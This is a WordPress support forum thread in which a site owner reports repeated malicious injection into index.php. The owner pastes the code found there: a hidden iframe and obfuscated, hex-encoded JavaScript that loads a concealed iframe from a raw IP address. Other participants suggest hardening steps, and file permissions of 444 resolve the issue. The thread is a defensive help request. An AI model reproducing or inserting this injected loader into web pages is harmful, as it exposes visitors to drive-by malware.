Support » Plugins » php inject problem in index.php

  • Resolved iuolsac


    I have installed WordPress 2.3.3 on my domain and I configured everything. After a couple of hours, a few people that were reading the first entry told me of a problem with the website, anti-virus software found malicious code / trojans.
    Basically, it was corrupted. At first, I thought it was something wrong with one of the plugins i used, but I deleted WP and reinstalled from scratch and the problem was back again in a few hours.
    This line of code appears in php.ini:
    <iframe src=’http://url’ width=’1′ height=’1′ style=’visibility: hidden;’></iframe><script>function v47da8689bd2a4(v47da8689bda9c){ function v47da8689be291 () {return 16;} return(parseInt(v47da8689bda9c,v47da8689be291()));}function v47da8689bf299(v47da8689bfc4e){ var v47da8689c11f1=2; var v47da8689c024a=”;for(v47da8689c0a6f=0; v47da8689c0a6f<v47da8689bfc4e.length; v47da8689c0a6f+=v47da8689c11f1){ v47da8689c024a+=(String.fromCharCode(v47da8689bd2a4(v47da8689bfc4e.substr(v47da8689c0a6f, v47da8689c11f1))));}return v47da8689c024a;} document.write(v47da8689bf299(‘3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D62207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3133353432292B276562373538646335376462305C272077696474683D313833206865696768743D3734207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E’));</script>

    I configured the .htaccess file and it didn’t seem to help. 🙁
    Any input would be appreciated, thanks. 🙂

    PS: I’m pretty much noob at WP ^^

Viewing 11 replies - 1 through 11 (of 11 total)
  • Did you change all your passwords? You might want to change your WordPress admin username also. This may or may not have come in through WordPress, but it doesn’t hurt to know about hardening WordPress.

    Yes, I’ve changed everything right after install.
    I’ve done everything that is recommended in there, the code still appeared. ;(

    Do you know what versions of Apache and PHP your host is running? Could be an exploit there, too.

    Apache version 2.2.8 (Unix)
    PHP version 5.2.5
    MySQL version 5.0.45-community-log
    Architecture x86_64
    Operating system Linux

    And update, I made the index.php file read-only – 644. The code appeared again. :/




    You said this:

    This line of code appears in php.ini:

    Im assuming that is a mispeak, because thats not your index.php? If its being added to your php.ini that suggests a little more than a simple WP php injection attack.

    Also, I would be looking at your server logs.

    Yes, I’m sorry. I meant index.php, I got confused a bit. ;(

    What theme are you using?

    Elixir orange.

    Moderator Samuel Wood (Otto)

    (@otto42) Admin

    Try making it 444. See what happens.

    Sometimes webservers are configured to run as the user instead of as a separate user. In which case 644 permissions are still writable.

    Also, yes, you will need your server logs. Talk to your host.

    Setting permissions to 444 seems to have fixed the problem. Thanks a lot for the replies. 🙂

    is there any solution for it without setting permissions 444 ?

    im suffering the the same

Viewing 11 replies - 1 through 11 (of 11 total)
  • The topic ‘php inject problem in index.php’ is closed to new replies.